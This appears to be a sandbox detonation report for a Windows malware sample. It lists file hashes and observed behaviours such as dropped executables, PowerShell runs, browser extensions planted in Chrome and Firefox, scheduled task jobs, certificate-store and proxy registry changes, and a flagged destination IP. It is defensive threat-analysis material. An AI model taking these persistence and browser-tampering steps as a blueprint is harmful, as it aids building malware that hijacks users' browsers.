| SHA256 | 05cc68d3053bb0b66b2be99fd163f58a8f0a90656f3b40b3dacbe3f1878aeb9f |
| SHA512 | c2bf113b678fd13e9893bde1aca1e3afd56b1ba586a37f7b41984053ee81fd14e317f6264a2b13766ded7b719c3109a766673f19f42140ea0cc5d943c7d71b24 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 5961d6b1d7ca1982cbab408ddf58c87a |
| SHA1 | b8b4762cad50d830ea340cd7daf0ef34fe527733 |
| SHA256 | ca56d408b9c9457f1d5bbebbf5f494349231e93a13754613cad12cd2545a27be |
| SHA512 | 3d51c0a33c4ddecb180f1078104f3b32d4e3648a25c00750039f72115c8f61e955a8f06a09ed2c92963c635b17284881e11b96f9abf78ae31510192a99bdf7d0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 571219382a07aafb93ee6142a08366c0 |
| SHA1 | f3c39980b6aa1ab82d033a9fdc89237ca3d56a7c |
| SHA256 | 65b2afeacf183a12b54a7af6b4f85390e43dd308baaa83e4ee9e2d5ec60e7db7 |
| SHA512 | 20a8527b617a314114b6fe5d6d62d90ab46012145458a29793d34f6d7fabc1aa5c27de98b85498ddce4e9b97a7ab15b9e36a634c5241893a6de992ec57ee7dfa |
C:\Users\Admin\AppData\Local\CEF\User Data\LocalPrefs.json
| MD5 | 2cb21a3c962dca8128820ca31c46dfdb |
| SHA1 | 92599f5557bdba0897915a8f4de5bf4b8d541c7c |
| SHA256 | 2a61787ae7d0e21069023166e8967160caf486e1c00b093ff22ee48477f62121 |
| SHA512 | 5c83020d35f60e71eba1761a57af680ae4e09a39f00f0da18933761ce527d19b01c6156af498a86589ace276c5588f7538eb56249419518308f392ee74f7825f |
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-16 05:11
Reported
2024-07-16 05:17
Platform
win10-20240611-en
Max time kernel
389s
Max time network
395s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\L4amOxuk\XKhTvOD.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\rundll32.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 141.98.234.31 | N/A | N/A |
Checks installed software on the system
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | C:\Users\Admin\AppData\Local\Temp\L4amOxuk\XKhTvOD.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Users\Admin\AppData\Local\Temp\7zSC8B8A64B\setup.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\AppData\Local\Temp\7zSC8B8A64B\setup.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\AppData\Local\Temp\7zSC8B8A64B\setup.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\AppData\Local\Temp\7zSC8B8A64B\setup.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\L4amOxuk\XKhTvOD.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\L4amOxuk\XKhTvOD.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | C:\Windows\SysWOW64\rundll32.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File created | C:\Program Files (x86)\AMqhlrBDqRJU2\ysYEpGTvJbMuM.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File created | C:\Program Files (x86)\UQtSSXvqU\epowzXZ.xml | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File created | C:\Program Files (x86)\OJBbginKvssDnbEKbsR\sUqOWwL.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File created | C:\Program Files (x86)\hMiQKFvmPLjeC\TsdwDqq.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File created | C:\Program Files (x86)\hMiQKFvmPLjeC\KeeYAat.xml | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File created | C:\Program Files (x86)\UQtSSXvqU\sEGvbu.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File created | C:\Program Files (x86)\OJBbginKvssDnbEKbsR\PgPwesd.xml | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File created | C:\Program Files (x86)\AMqhlrBDqRJU2\BeqXEUx.xml | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| File created | C:\Program Files (x86)\ezMWJXFFLyUn\WqPIvfG.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\MRTHivZIQsRdEanwm.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\rescache\_merged\3720402701\1568373884.pri | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| File created | C:\Windows\rescache\_merged\3720402701\1568373884.pri | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| File created | C:\Windows\Tasks\bEtnHIcecDUtXwQuWS.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\FPIEUdZLMYPzsiUNM.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\OcPshDNvhDnVmSv.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\Debug\ESE.TXT | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| File created | C:\Windows\rescache\_merged\3720402701\1568373884.pri | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| File created | C:\Windows\rescache\_merged\3720402701\1568373884.pri | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| File created | C:\Windows\rescache\_merged\3720402701\1568373884.pri | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
Enumerates physical storage devices
Program crash
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\L4amOxuk\XKhTvOD.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\L4amOxuk\XKhTvOD.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Windows\SysWOW64\rundll32.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\system32\browser_broker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{4f38e779-0000-0000-0000-d01200000000}\MaxCapacity = "14116" | C:\Users\Admin\AppData\Local\Temp\L4amOxuk\XKhTvOD.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{4f38e779-0000-0000-0000-d01200000000} | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket | C:\Users\Admin\AppData\Local\Temp\L4amOxuk\XKhTvOD.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
